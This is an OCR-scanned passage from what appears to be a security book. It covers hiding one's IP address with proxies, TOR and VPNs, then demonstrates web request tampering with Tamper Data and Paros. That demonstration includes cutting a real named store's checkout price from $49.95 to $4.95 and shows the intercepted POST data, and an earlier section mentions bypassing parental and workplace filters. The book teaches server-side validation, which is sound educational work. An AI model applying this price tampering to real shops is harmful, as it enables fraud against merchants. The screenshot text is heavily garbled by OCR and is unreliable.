After you have finished using the proxy server, or it stops working, you will want to remove it 
from your settings in Internet Explorer. After removing it, revisit the IPGoat website to verify that 
your standard public IP address is showing. Hint: You may need to refresh your page. 

To remove a proxy in Internet Explorer, 


1. Open Internet Explorer. Select Tools, Internet Options, Connections, LAN Settings. 
2. Remove the check for the use a proxy server box. Click OK twice. 


{ " 
Local Area Network (LAN) Settings ES 


Automatic configuration 


utomatic configuration may override manual settings. To ensure the 
e of manual settings, disable automatic configuration. 


Automatically detect settings 


Use automatic configuration script 


Address 


xy server 


o Use a proxy server for your LAN (These settings will not apply to 
dial-up or YPN connections). 


Address: Port; 


Advanced 


Bypass proxy server For local addresses 


The Onion Router, or TOR as it is referred to, is free software that will protect your identity by 
masking your IP address. Another benefit of TOR is that it offers partial encryption. When your 
machine makes domain name system (DNS) requests or you visit web pages, your activity using 
TOR will be encrypted from anyone monitoring your activity on your local area network (LAN). 
What this means in plain English is that if I am at a hotel or hotspot, using TOR is a good way 
to keep other individuals with sniffer programs from monitoring my plain text traffic and activ- 
ity. Students who use TOR on college campuses and individuals who use it at work will be able 
to bypass monitoring systems. This also goes for the savvy kid; if a parent decides to use content 
filtering that is offered on many of today’s routers, a child can bypass those filters using TOR. 
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Many people have the misconception that TOR will provide them end-to-end encryption. 
While this sounds great, it is not actually the case. Unlike a VPN, TOR is not encrypted from end 
to end. While TOR is encrypted when it exits from your LAN, at some point out there on the wide 
area network (WAN) your traffic will become unencrypted. This unencrypted point in the com- 
munication link is referred to as the exit node. TOR gives you the ability to act as a relay, which 
could result in you being an exit node for traffic. This is not the default for good reason. Never, 
ever, choose to be a relay as this may result in you becoming an exit node for the TOR network. 
Here are two reasons why you should never choose to be a relay: 


1. Someone could do something bad and it might someone get tied back to you. 

2. Ifyou decide to hack and run a sniffer, your captures may contain illegal files or contraband. 
If you carve out the files and see something you don’t want to see, you will likely never be 
able to forget what you saw. Don’t do it! Do I have to spell it out? 


The easiest way to use TOR is to install the Vidalia bundle. The latest version of the Vidalia 
bundle is available at the following link: http://www.torproject.org/dist/vidalia-bundles/. The lat- 
est version available for download at the time I wrote this chapter was 0.2.1.26-0.2.10. Download 
the EXE for Windows (all versions) and the DMG file for Mac OS X. The install of Vidalia will 
include Vidalia, TOR, Polipo, and the TOR button for Firefox. 


vidalia Bundle setup -lOl xl 


- Choose Components 
Choose which features of Vidalia Bundle you want to install. 


Check the components you want to install and uncheck the components you don't want to 


install. Click Next to continue. 

Select the type of instal: [NEIN ~] 

Or, select the cpr zi Vidalia 0.2.10 Position your mouse 
B scd bres &&-[v] Tor 0.2.1.26 over a component to 


EIv] Polipo 1.0.4.1 see its description, 
&&-[v] Torbutton 1.2.5 


Space required: 26.9MB 


Vidalia Bundle 0,2.1.26-0,2.18 (Rev. 1) 


_ cook Cp] e | 


After installing TOR, wait to receive the message that you are connected to the TOR network. 

If you are have trouble connecting, be sure to verify that your time and date are correct. A red 
or yellow onion in the right hand corner of the taskbar means your TOR connection is not work- 
ing properly. A green onion in your taskbar means you have successfully connected to the TOR 
network. 
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Open the Firefox browser and click the red TOR DISABLED button in order to change the 
status to TOR ENABLED. The TOR button will turn green when TOR is enabled. Once you are 
connected to the TOR network, you may notice that you are not in Kansas anymore, Dorothy. In 
this example, my home page Google, which is normally English, turns to Slovakian. 


Fle Edt View History Bookmarks Toos Help 
eu Q OX a Y (Y noii googe.sk] 


Web Obrázky Mapy Prekladač Blogy Aktualizácie Gmail viac v 


Slovensko 


Google 


fi Rozšírené hľadanie 
L Jazykové nástroje 


Hľadať v Google | Skúsim šťastie 


(S) Scripts Currently Forbidden | «SCRIPT»: 8 | <OBJECT>: 0 


(SQ, To Enabled BE unted States 72.14.204.103 Google Inc, 72.81.255.124 | 


Another option is using free VPN software, which offers you both IP address obfuscation and 
encryption. Some of the free VPN clients include 


B DroXPN 
B AlonWeb 
E DacktiX.net 
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Hotspot Shield 
UltraVPN 
FreeVPN 
CyberGhost 
Always VPN 


Using a free VPN usually involves installing the software and signing in with a username and 
password. When a person uses VPN software, an extra network card will appear in their network 
connections, usually referred to as a Tun/Tap device. Some of the software you install may contain 
spywate, so use caution if you decide to use them. Many of these companies usually also offer pay 
services that give customers added benefits. For example, FreeVPN allows pay users to select IP 
addresses that originate from a specific country, like China. 

CyberGhost only allows you to obtain IP addresses that originate from Germany, while 
ProXPN primarily offers U.S.-based IP addresses. For this reason, ProXPN is a popular choice 
among users from outside the United States who are trying to access services only offered to U.S.- 
based IPs, such as television programming. I find ProXPN to be one of the easiest and most reli- 
able free VPN services on the market. While it is a great product, there is a danger to be aware of 
when you are using it or any other free VPN software. I discovered the danger by accident. See, 
after connecting my hard drive light started going crazy. I realized why it was happening; I was on 
a private network with many other individuals. I was connected to a LAN with other users, many 
who were scanning my box and trying to enumerate information from my computer. 


80°cXPN 


General | Connection Status | Network Activites | Help / About] - 


| Connect to: 
User Name:  bkinsinstructo (BGB EE 
Password LL 
Don't have an account? 
Remember me 
Connect} { Reset 


Default connect to: 
| | E United States | 


When you connect to the ProXPN servers, you usually receive an IP address in the 173.0.0.0/16 
address. When you open mail, and connect to IRC, websites, and FTP sites, your Internet service 
provider (ISP) IP address will not be detected. A simple visit to IPGoat.com displays the Prox PN 
external IP address. 


NM ipGoat.com 
ad The GOAT of the Internet 


Click here to check out our blog! 


© soocwek atio f 


Current IP Address 


173.0.2.120 
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Another benefit of free VPN services is the encryption that is provided to users. If you use 
ProXPN at a hotel or a hotspot, people will not be able to view your traffic because you are on a 
completely different network than they are. However, other people on the other end of the tunnel 
can sniff the traffic and view your plain text traffic. In this example, I connected two machines to 
the ProXPN servers, pinged one machine from the other, and was able to view the traffic. 


ping 173.0 


proXPN v2.2.7 
: : e CC ^ ? Connected to United 5t. 
Pinging 173.0.3 W ] oytes O C a: IP address: 173.0.3.217 


from 

y from 
eply from 
Reply from 


Ü (Untitled) - Wireshark 
Ele Edit View Go Capture Analyze Statistics Help 
Kaaa FSExSsSi_eooFZi SB) Raan umn l 


Eiter: [icmp Expression... Clear Apply 
Time ~ ‘Source Port Source Port Destinatic Destination Protocol Info 

B ICMP Echo (ping) request 
2010-10-28 19:45:30. 173.0.3.217 173.0.2.120 ICMP Echo (ping) reply 


2010-10-28 19: 173.0.3.217 ICMP Echo (ping) request 
2010-10-28 1! 173.0.2.120 ICMP Echo (ping) reply 
2010-10-28 19 173.0.3.217 ICMP Echo (ping) request 
2010-10-28 19: aa 173.0.2.120 ICMP Echo (pina) reply 
2010-10-28 19: .634673 173.0.2.120 173.0.3.217 ICMP Echo (ping) request 
2010-10-28 19:45:33.773505 173.0.3.217 173.0.2.120 ICMP Echo (ping) reply 


The fact that your traffic becomes unencrypted once you get to the other end of the VPN is 
not your only concern. Once you are on another network (virtual) with other users, you will lose 
the protections of your external firewall. In the example here, a TCP scan is done against another 
machine that I connected to the network. If my machine was behind my external firewall, a scan 
like this on my machine would not be possible from the Internet. (It would, however, be possible 
and very likely on my external firewall.) A firewall on your OS will help to protect your system. 


Shortcut to cmd.exe - -/5) x| 


"ed ports 


proXPN v2.2.7 
Connected to United Stat 
0.3. 


If you are trying to bypass firewall restrictions and use protocols like IRC, a VPN client will 
get you past those filters. At the same time, however, a VPN client will expose harmful traffic that 
you might not face behind the security of your firewall. For example, my wife and I share folders 
and printers, as many home users do. When I enter the VPN, others may try to connect to those 
shares. Or, they might even try to print the Bible on our printer, wasting our ink and paper. And, 
even worse, if they are able to successfully compromise my machine, an attacker could move 
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laterally through my internal network and maybe attempt to attack other devices on my home 
network, such as my TV and Wii. In the future, many of us will have even more IP-based devices 
connected to our networks, such as video camera systems, alarm systems, HVAC, and VoIP sys- 
tems. If an attacker is able to penetrate your internal network, they can do some serious damage 
now, and possible even more damage in the coming years. If your hard drive light starts going 
crazy or your system starts acting funny, 


B Check your network connections by typing netstat —an. 
B Run a sniffer like Wireshark and try to examine the traffic. 
B Disconnect from the network. 


The WorldIP Firefox plug-in will show you your external IP address. If you are not using any tool 
to change your address, you will see the address provided to you by your Internet service provider. 
If you are using TOR, ProXPN, or Proxy-List.org, you will see a different IP address. 

To use the WorldIP plug-in, which will display your external IP address, 


1. Open Firefox, go to http://www.google.com and search for add-ons. 
2. In the Search box, type “WorldIP.” 
3. Click Add to Firefox and restart Firefox. 


Note that when you do not change your external IP address, it is broadcast to the world. It will 
be in the web logs of servers and can likely be traced back to you. Notice information about the 
service provider, Verizon, and the location of the IP in the Baltimore area. 


72.81.255.124 


Wy 
eA, o Tuy gp 
XJ 


Advanced 


(F) Name Address: pool-72-81-255-124.bltmmd.fios.verizon.net 
@ remote Port: 5036 


+) Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.11) 
Gecko/20101012 Firefox/3.6.11 ( .NET CLR 3,5.30729) 


(F) Location: United States 


More Info | Lookup who owns an IP | Traceroutes | 


‘Forbidden | «SCRIPT»: 17 | <OBJECT>: 0 í 


fX S) Q, TorDisabled $È United States 209.200.10.10 Webair Internet Development Company Inc. 72.81.255.124 


If you are using a tool to change your IP address, the new IP address will be displayed in the 
right-hand corner of the screen. You may need to right click on the IP and select Update External 
IP if the IP address is not matching with what you see on the IPGoat.com website. 
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173.0.2.222 
adr 


BAAA! Typ 


CECI 17 | <OBJECT>: 0 ag 


There are also some pay services that will help you to hide your IP address. One of the more 
well-known pay services is called Hide My IP. The company offers a 14-day free trial of their soft- 
ware and it is available for download at http://www.hide-my-ip.com/. The software works on all 
versions of Windows and has an easy-to-use interface. When you go to the website to download 
the software, it informs you of your current IP address and location information. 


Your IP Address 72.81.255.124 Reveals The Following: 

Å You are located in Catonsville, Maryland, United States 

EN Your ISP is Verizon Internet Services 

EN Your hostname is pool-72-81-255-124.bitmmd.fios.verizon.net 


To use Hide-my-IP: 


1. Go to http://www.hide-my-ip.com/ and click Download Hide My IP. 

2. Double click on HideMyIP.exe. 

3. If you do not have version 2.0 of the .NET framework installed, click Yes to download it and 
install it. 

4. Click Next, Accept if you agree to the license terms, Next, and Next. 

5. Restart your system if you are prompted to do so. 

6. Double click on the Hide My IP shortcut on your desktop. 

7. Click Start Trial if you are using the trial version. 

8. Click Hide My IP to hide your IP address. 


Hide My IP 5.2 


173.234.1140. TA 


| Quick Settings | 


T" Change IP Every fio | Minutes [^ Launch On Startup 
T Clear Cookies When IP Changes I Require US Based IP 


Â Demo Mode 

Hide My IP is running in demo mode. Browsing speed will be slower than the full version 
and a limited number of IPs will be available for United States and United Kingdom. 
Purchase today! for $23. access to our Standard IP service which has 
several locations, dere canit] vicos deer loses Order Hide My IP 
To get help, press F1, or call our toll free support ine 1-866-343-6722, or contact us. 


Copyright ©2008-2010 My Privacy Tools, Inc Help Premium Service Enter License Key 
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The advanced settings allow you to encrypt, change your user agent, and enable IP history. 
Consider buying the software if you like it. Don’t be a hacker, install it for 14 days, then go back 
to your snapshot in VMware and reinstall. That would be unethical and I advise against doing it. 


Summary 


When you surf the Internet, you leave indicators of who you are and where you are coming from 
in the web logs of servers. Hackers do not want their activity traced backed to them, so they use 
protection mechanisms like proxy servers, VPN services, and TOR. The various methods that can 
be used to conceal your external ISP address all have various advantages and disadvantages. Be 
aware that individuals within your company or organization may use these techniques to mask 
their activity. Being aware of the methods the bad guy uses can help you understand why it may be 
difficult to track culprits down and why an IP address entry in your web logs will not necessarily 
lead you to the perpetrator of an attack or malicious activity. 


Chapter 5 
Manipulating the Web 


Introduction 


This chapter deals with the subject of web application penetration testing. Primarily, were talking 
about how users are able to manipulate data to and from a web page or web application for potentially 
nefarious reasons. It is important to understand that most of these attacks are specific to certain types 
of web pages, or to certain types of web applications, so finding these vulnerabilities is most often the 
result of trial and error. Especially because the bugs are not usually generic but directly related to appli- 
cations or specific setups, there is no “cookie cutter” approach to either exploiting these vulnerabilities 
or in fixing them. We will also find (particularly in the case of SQL injection and cross-site scripting 
[XSS]) that while there are some tools that can help us automate this process, they tend to be very loud 
from the perspective of a receiving host, so your attack is likely to be detected and potentially deterred. 

Up front, we should recognize that this is one chapter about web penetration testing, a topic 
that could easily fill a book. Our goal then is to touch on a few major areas, while recognizing that 
it would be impossible to be comprehensive. There are literally hundreds of such tools we could use 
and demonstrate, but for the sake of simplicity we will just choose a few. 


Change the Price with Tamper Data 


Amazon.com founder and CEO Jeff Bezos once told a story about what he considered to be 
his favorite software bug from the very early days of Amazon.com's existence. When selecting a 
book to purchase, the customer could enter in a text box the number of such books they wanted 
to order. Unfortunately for Amazon.com, the customer could also enter a negative number, and 
Amazon.com would automatically credit the customer's credit card. 

This bug was quickly fixed, and of course Amazon.com would go on to become a powerhouse 
online retailer. You would think that, generally speaking, silly software bugs like this would also 
be fixed across the board, but (unfortunately for retailers) this just isn't the case. While you may 
not be able to order a negative number of products from an online store, many such sites still have 
vulnerabilities associated with them. And because you're dealing with products, services, and ulti- 
mately cash, the vulnerabilities can lead to real problems. 
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Now it should be made clear that most large scale online retailers like Amazon.com are thor- 
oughly familiar with most of these issues. If you tried to repeat the demonstration in this chapter 
with these large online retailers, it is unlikely that they would work. However, there are a number 
of smaller online sites that are still problematic. Let's walk through one example where we can 
purchase a product for a different price than the one displayed on the page (in fact, whatever price 
we choose). After the walk through, we'll talk about why this is possible. 

The website that I'll be using for this example is ninjaremote.com, which is a real, live online 
store that sells a product called the Ninja Remote. This remote is a key fob-sized, “TV-B-Gone” 
type device that enables the owner to surreptitiously control TVs by turning them on and off, 
changing the volume, or changing the channel. This works by quickly sending over one thou- 
sand remote codes, the effect of which is to brute force the TV into accepting the appropriate 
commands. 


8G - ÓN || http//www.ninjaremote.com/ Eg -| |W Wikipedia (en 


|. Ninja Remote - Stealth Television Ga... | + 


JA RENE 


STEALTH HESAN GADGET 


Preamble: 


A mystical group began studying Nonuse, or as we say in the western world, the art of stealth circa 522 A.D. This art was practiced by 
Japanese priests who studied mythical practices and were subserviant to the ruling class 


Then nearly 150 years later, in 645 A.D. the priests perfected their fighting skills and practiced Nonuse to perfection. Using the skills for 
protection only, they incorporated: stealth, sword play, bow & arrows, projectile weapons, poison and generally speaking kick ass fighting 
skills. 


Later, around 794 A.D. the wealthy regularly feuded and required intelligence and assassination of their detractors. The Ninja was born. His 
skill and exactness desired. Ninjas flourished and legendary figures were born. Ninjas brought justice to an otherwise unjust world 


Today, over a millenium later, there is still a need for Nonuse. Life and death is by no means a daily struggle, but as someone famously put 
it- Life is entertainment and entertainment is life. Showing NCAA Women's Basketball on the big screen is a direct attack on your 

ainment, and your life. Using Nonuse, by hiding in the ceiling of the bar the night before is just not an option, you'd miss too much TV. 
Using a Ninja dart to tap the channel button while hiding behind the Golden Tee machine won't cut it either, you have chicken wings 
cooling at your table. You must fight back, you must use... the Ninja Remote 


The tool that I'll be using is a Firefox plug-in called Tamper Data (https://addons.mozilla.org/ 
en-US/firefox/addon/966/). Tamper Data sets up your browser as a proxy server, which allows you 
to view and modify HTTP/HTTPS headers and post parameters. What this means is that when 
data is set from your computer to the target website, we can actually view and modify the data 
before it gets sent. 


Add-ons for Firefox > Extensions > Tamper Data 


& Tamper Data 11.01 


by Adam Judson 


Use tamperdata to view and modify HTTP/HTTPS headers and post parameters 


Continue to Download 


e—a 
E Updated February 11, 2010 
= m Website http://tamperdata.mozdev.org 
Ø share this Add-on Works with Firefox 3.5 - 3.6.* 
Rating 71 reviews 


Downloads 2,950,769 
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Let’s first visit www.ninjaremote.com and see how the website should operate normally. 


PRERE 


5 Ninja Remotes ^ 
Buy Now USA & Canada Buy Now International 


USA & Canada $39.95 + $10 shipping International $48 + $27 shipping 


BEBE 


3 Ninja Remotes ^ 


Buy Now USA & Canada Buy Now International 


USA & Canada $26.95 + $10 shipping International $26.95 + $27 shipping 


BE 


2 Ninja Remotes ^ 
Buy Now USA & Canada 


USA & Canada $19.95 + $7 shipping International $19.95 + $21 shipping 


When you scroll down the page, you find a number of purchase options. In this example, we're 
looking for the best value, so we want to purchase five Ninja Remotes for $39.95 plus $10 shipping 
(this is the top left button). If we click on this button, we are taken to the order page. 


Click below to use PayPal or Google Checkout instead: 


NINJA RENE [Paypa] Buy Now -® 


STEAH HELDIN GADGET 


Complete Your Purchase 
E uza : 


Billing Address: Shipping address: 


In this image you can see that the price of $49.95 has populated the Amount box, and I high- 
lighted it with my cursor. It should be said that this field is not editable at this point. Filing in the 
remainder of the required information is standard, and this would lead to a completely normal 
purchase procedure. However, let’s go back to the previous page and invoke Tamper Data’s capa- 
bilities. First, here are the purchase options: 


Ninja Remote - Stealth Television Ga... 


Buy It Now: 


BERRE 


5 Ninja Remotes 


Buy Now USA & Canada Buy Now Intemational 


USA & Canada $39.95 + $10 shipping International $48 + $27 shipping 
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Now before we go any further, let's start Tamper Data. From the Tools menu, select Tamper 
Data and the following popup will appear: 


{@ Tamper Data - Ongoing requests 
Start Tamper Stop Tamper Clear 


Filter 


Time Duration Total Duration Size Method Status Content Type URL Load Flags 


Request Header Name Request Header Value. | Response Header Name Response Header Value 


We can browse at will, but Tamper Data will not intercept any data until we click Start 
Tamper. So let’s start Tamper Data and then return to the purchase options. When we click on 
the Buy Now link, the browser pauses because the HTTP/HTTPS headers and post parameters 
are sitting inside the Tamper Data extension waiting for you to view and modify. The page to 
complete your purchase doesn’t appear yet, because it is still waiting for your data. When we click 
on the Buy Now link, Tamper Data asks us what we want to do. 


Tamper with request? Imm 


[?] https://www.ninjagizmos.com/payments/payments.aspx 


V] Continue Tampering? 


“Tamper” allows us to view and modify the request data. “Submit” sends the data “as-is” and 
“Abort” ignores the data. So let us select Tamper and see what data we are able to view. 


https://\www.ninjagizmos.com/payments/payments aspx 

Request Header Name Request Header Value [ Post Parameter Name Post Parameter Value 
www.ninjagizmos.com 2 
Mozila/S (Windows; U; Windows NT 6. |||| store 5 

Accept-Language en-usenq-05 shipsmount 3 

Accept-Encoding grip defiate. description 5+NinjasRemotes 

Accept-Charset 1S0-8859-1 utf-8;q-07,".q-0.7 

Keep-Alive n5 

Connection keep-alive 

Referer http://www.ninjaremote.com/ 


Cookie ASP.NET _Sessionld=j522f45dk4ntsnhjiat 
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The information on the left side of the Tamper Data popup is the request header names and data. 
For our purposes in this example, it is not necessary to modify any of this data. On the other hand, 
the right side of the popup contains post parameter names and values that are clearly of interest to 
us. The “store” value indicates the number of products we're asking to purchase. If we wanted to, we 
could change this and submit the data to purchase more than five remotes for the same price. The 
"amount" field (highlighted) is the total price of our purchase including shipping (remember $39.95 
plus $10 shipping). Also recall that this is the value that populated the field on the order page. 

The difference here is that Tamper Data allows us to modify any of this data that was previously 
not available to us. So if we change the values in Tamper Data, these are the values that are sent to 
the order page. In this demonstration, let's change the “amount” field to $4.95 instead of $49.95. 


coo ——— 
https;//veww.ninjagizmos.com/payments/payments.aspx 

Request Header Name Request Header Value Post Parameter Name Post Parameter Value 

Host www.ninjagizmos.com a 

User-Agent Mozilla/5.0 (Windows; U; Windows NT 6. | ||| store 5 

Accept text/html application/xhtml«xml applica. LINE  — 9 1] 

Accept-Language en-usenqz05 shipamount 3 

Accept-Encoding gzip,deflate description 5« Ninja Remotes 

Accept-Charset 150-8859-1,utf-8;q2077,, 4207 

Keep-Alive 115 

Connection keep-alive 

Referer http://www.ninjaremote.com/ 

Cookie ASP.NET Sessionldz j522fSdicintsnhjia 

[ ok ]([ Cancet 


When we click OK all of this data is sent back to the website's order page. Here is the result: 


(DNinja Remete Pu i-um X | 
Ele Edit View History Bookmarks Tools Help cfi 
is) Be a CBI osos ninjagizmos.com/payments/payments aspx r -| [W= Wikipedio (e 2| 9 


| Ninja Remote - Purchase 


Click below to use PayPal or Google Checkout instead: 


NINJA RENE [C Papa ] NNN 


STEALTH TELEWsieN GADGET 


Complete Your Purchase 
Billing Address: Shipping address: 
Amount 


Card Nut 


Month » Year + 


Country 


pm 


Email 


Vergi tse [paypal] 
byVeriSign VERIFIED 


32M8 05M8B/50MB Fiddler: OFF (auto) @ SA mg 
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You can see in this example that the “amount” is now $4.95 instead of $49.95. Again, this field 
is no longer editable at this point. If we were to continue this purchase, it would be processed like 
any other order. Now a reasonable person might ask: Won't the people processing the order notice 
this discrepancy? It is possible they might. It might be seen as an error, or it might be overlooked 
by accident. But that is a human factor that is beyond the scope of this demonstration. The prob- 
lem here is that the website, complete with its VeriSign logo and PayPal seal, is vulnerable to its 
data being modified. 

The real issue here is one of server-side validation, or perhaps better stated, the lack of it. The 
server processing the order data should not permit the user to change or modify certain data. The 
server should be validating the data to ensure that such modifications are not taking place. If this 
occurred, we would get some sort of an error, or a request to the user to enter valid data, instead 
of a perfectly normal-looking order page. 

This same issue may or may not work on other pages; since every online store is different you 
might have to try different things to see how they work. Again, it should be obvious that this is 
unlikely to work on large online stores, but there are plenty of other vulnerable places out there. 

Finally, it should be pointed out that other similar proxy type tools can be used for the same 
purposes, I selected Tamper Data because it is browser-based and easy to use and demonstrate. 
What I like about Tamper Data is that because it is a browser extension, I don't have to make any 
changes to my browser settings to use it; everything is done automatically. Furthermore, because it 
is a browser extension, it is operating system (OS) independent. In the next section, I'll talk about 
a similar tool called Paros Proxy. 


Paros Proxy 


Paros Proxy (“Paros”) is another similar proxy tool useful for man-in-the-middle (MITM) appli- 
cations. As opposed to Tamper Data, Paros is a standalone Java-based application. Accordingly, 
Paros should work in any Java-supported environment. 


|| File Edit View Analyse Report Tools Help 
Sites Request | Response | Trap | 


Since Paros is a standalone application, there are some setup requirements necessary to use it 
in a browser-based environment. More specifically, we have to tell our browser to send the data to 
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Paros before it gets sent on to our target site. If we navigate to Tools, Options, Local Proxy, we find 
the default proxy settings for Paros: 


File Edit View Analyse Report Tools Help 
| Sites 


Local proxy 
Local proxy 
Address (eg localhost, 127.0.0.1) [localhost 
Port (eg 8080) [8080 


Set your browser proxy setting using the above. The http port and https 
port must be the same port as above, 


Generally speaking, you can keep these settings as is (unless of course you're already running 
something else on port 8080). Either way, just take note of your settings so we can configure the 
browser to use them. As a side note, while we demonstrate how to set up Paros here, any stand- 
alone program will require you to configure it and/or your browser to work together. 

First, let us review the manual method. This is user intensive, but we'll cover it for the sake of 
being comprehensive. In our browser (again, we're using Firefox), select Tools, Options, Advanced, 
Network, and click on Settings next to “Configure How Firefox Connects to the Internet.” Under 
manual proxy configuration, enter the settings as "localhost" and port “8080”: 


Configure Proxies to Access the Internet 

© No proxy 

(© Auto-detect proxy settings for this network 
Use system proxy settings 


Manual proxy configuration: — gj | 
HTTP Proxy: localhost Por: — 80807 

| ] Use this proxy server for all protocols 
| SSL Proxy: localhost Port a080) 
| ETP Proxy: Port: (Ja 
Gopher Proy: _ Port: [15 
SOCKS Host: Port: ol 


© SOCKS @ SOCKS y5 
No Proxy for: 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
© Automatic proxy configuration URL: 
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Once we click OK, this directs all of our data through Paros, which is listening on localhost 
port 8080. Now we have access to all of the data, and we can view and modify things as we please. 
In this case you truly are a man in the middle. The difficulty here is that we have to manually 
change the proxy settings back and forth every time we want to use Paros. 

A much easier method of managing proxies (especially if you use more than one) is one of 
the many proxy extensions to Firefox. I prefer FoxyProxy (https://addons.mozilla.org/en-US/ 
firefox/addon/2464/) but many others are available. In this case, FoxyProxy allows us to set 
up multiple proxy configurations and then enable and disable them at the click of a button. 
So if you have more than one proxy tool, or if you use TOR or other similar services, you can 
manage them very easily. FoxyProxy stores my settings ("localhost and port “8080”), and I 
can label the settings and enable them at will without fussing with any manual configuration 
changes. 

Once Paros is configured, the data passing through the proxy is logged and collected, but not 
modified. The sites that you visit will be logged in the left window, and the request and response 
data will be collected in the right window. As an example, I configured my iPhone to use Paros 
and collected the following request data: 


POST hitp:/iphone-wu.apple.com/dgw?imei=B7693A0 1-F383-4327-8771-5014BD85B5C 1&apptypezweather 
&t-4 HTTPA.1 
GB |, http:/fiphone-wu.appl |! Host: iphone-wu.apple.com 
-d http://weather. yahoo | User-Agent: Apple iPhone v2.2 Weather v1.0.0.5G77 
B-d https://webmail.bah.c Accept: ** 
@ POST:Microsoft-S¢ | Accept-Language: en-us 
Content-Type: text/xml 
Cookie: s_vi=[CS]v1|4A3D5F6F00003E95-A0208A50000003F[CE]} 
Content-Length: 347 
Connection: keep-alive 
Proxy-Connection: keep-alive 


<?xml version="1.0" encoding="ulf-8"?><request devtype="Apple iPhone v2.2" deployver="Apple iPhone v2.2" 
app="YGoiPhoneClient’ appver="1.0.0.5G77" api="weather’ apiver="1.0.0" acknotification="0000"><query id=" 
30" timestamp="0" typez"getforecastbylocationid"»«list»«id» USMD0181«/id»«/list»«Ianguage»en US«/lang 
uage><unit>f</unit></query></request> 


[Raw View v] 


hitpvweather.yahooapis.com/forecastrss ?p=USMD0181&u=f 
hitp-/iphone-wu.apple.com/dgw?imeizB7693A01-F383-4327-8771-501ABD... 
hitps:/iwebmail.bah.com/Microsoft-Server-ActiveSync?User=5364388Device... 
hitpv/weather.yahooapis.com/forecastrss ?p=USMD0181&u=f 
hitp-//iphone-wu.apple.com/dgw?imei-B7693A01-F383-4327-877 1-5014BD 


In the Request tab ofthe right window is a POST to iphone-wu-apple.com asking for a weather 
update. Next we see the response: 
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Date: Sun, 08 Aug 2010 22:33:01 GMT 
X-YSTATUS: 200 
Cache-Control: private 
-d || Connection: close 
Content-Type: text/plain;charset=UTF-8 


<?xml version="1.0" encoding="UTF-8"?><response> 

«result type-"getforecastbylocationid" timestamp="1281306781"><list count="1" total="1"><item><location 
id="USMD0181" city="Glen Burnie” regionz"MD" country="US" regionnamez"Maryland" countryname="Unit 
ed States" /><units temperature="F" distance="mi" pressure="in" speed-"mph" /><wind chill="87" directio 
n="150" speed="8" ><atmosphere humidity="44" visibility="10.00" pressure="29.96" rising="0" /»«astrono |= 
my sunrise="0613" sunset=" " moonfacevisil 0.696" moonphase="0" /»«condition code="30" text=" 


Partly Cloudy" temp="87" time="1754" timestamp="1281304440" /»«link»hltp-//m.yahoo.com/appleww/one 
search?p=Glen+Burie+MD</link><forecast dayofweek="1" low="70" high="90" code="29" text="Partly Clo 
udy" /><forecast dayofweekz"2" low="73" high="94" code="34" text="Mostly Sunny" /><forecast dayofweek=" 
3" low="77" high="98" code="30" text="Partly Cloudy" /»«forecast dayofweek="4" low="76" high="94" code=" 
28" text="Mostly Cloudy" /»«forecast dayofweek="5" low="77" high="91" code="37" text="Isolated Thunderst 
Arms” re davafy kz^&* inwa"? hinh="9 dez "az nlated Thund rms" /»«litem»« 


12" ra Ti retn 


hitpiweather.yahooapis.comiforecastrss?p=USMD0181&u=f 

hitp;/liphone-wu.apple.com/dgw?imei-B7693A01-F 383-4327-8771-501ABD... 

hitps://webmail.bah.com/Microsoft-Server-ActiveSync?User-536438&Dewice... 
is.com/forecastrss?p-USMD0181&u-f 


)1-F 


In the Response tab of the right window, we see the HTTP header and response data. If we 
visually parse the large amount of XML data in the middle of the screen, we can pick out specific 
elements of the weather data. Now for a little bit of fun: Can we change this data? Of course we 
can. If we move to the Trap tab of the right window, we see check boxes for Trap request and Trap 
response: 


POST http://iphone-wu.apple.com/dgw?imeizD4738D64-75BC-4EA7-96AD-8E089A16E656&apptypezweath 
er&t=3 HTTPA.1 
Host iphone-wu.apple.com 
Content-Type: textxmi 
4 || User-Agent: Apple iPhone v3.1.2 Weather v1.0.0.7D11 
Accept: */* 
Accept-Language: en-us 
Content-Length: 359 
Connection: keep-alive 
Proxy-Connection: keep-alive 


<?xml version="1.0" encoding="ulf-8"?><request devtype="Apple iPhone v3.1.2" deployver="Apple iPhone v3.1 
.2" app="YGoiPhoneClient" appver="1.0.0.7D11" api="weather” apiver="1.0.0" acknotification="0000"><query i ||| 
d="30" timestamp="0" type-"getforecastbylocationid"» «list»«id» USNV0050/2436704«/id» «list» «language» e 
n US«llanguage»«unit»f«/unit» «/query» «request» 


RawViewn | [F] Trap request [7] frap responsa 


hitpJweather.yahooapis.com/forecastrss?p=USMD0181&u=f 
hitpiphone-wu.apple.com/dgw?imei=B7693A01-F383-4327-8771-501ABD... 
hitps:/webmail.bah.com/Microsoft-Server-ActiveSync?User=5364388Device... 
hitp-//weather.yahooapis.com/forecastrss?p-USMD0181&u-f 

hitpuliphone j 01-F 7-8771-501ABD 
hitps:/webmail.bah.comMicrosoft-Server-ActiveSync?User=5364388Device... 
hitp-//iphone-wu.apple.com/dgw?imeizD4738D6A-75BC-4EA7-96AD-8E089... 
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Now when the iPhone weather app asks for an update, we can view and modify the request 
and response. In this particular case, we want the request to move on untouched, and want to 
modify the response before it reaches the phone. I changed the current temperature from 87 
degrees to 127 degrees and continued the request. The result on my phone is shown here: 


Glen Burnie 
H: 90° L: 70 


SUNDAY 


MONDAY 
TUESDAY 
WEDNESDAY 
THURSDAY 


FRIDAY 


e! Updated 8/8/10 6:59 PM [i] 


Ouch, that's pretty hot! Changing the temperature is a fun example, but there are obviously 
options with more malicious potential. Just for the sake of compatibility, I repeated the Ninja 
Remote price change demonstration with Paros. The steps are a little bit different since Paros 
works outside of the browser environment, but the results are the same: 


POST hitps:/iwww.ninjagizmos.com/payments/payments.aspx HTTP/1.1 

Host www.ninjagizmos.com 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv.1.9.2.8) Gecko/20100722 Firefox/3.6.8 
Accept text/html application/xhtmi+xmi,application/xm|,q=0.9,*/";q=0.8 

Accept-Language: en-us,en;q-0.5 

Accept-Charset ISO-8859-1,utF-8;q=0.7,*,q=0.7 

Keep-Alive: 115 

Connection: keep-alive 

Referer. http-//iwww.ninjaremote.com/ 

Cookie: affil-0; ASP.NET Sessionld-ydd3eq55v3ocu245asc1otq4 


a-&store-5&amount EE Esshipamount-3&description-5*Ninja«Remotes 


[V] Trap request [J| Trap response 


Manipulating the Web m 143 


As you can see in the Trap box, our POST parameter values are there for the editing. Changing 
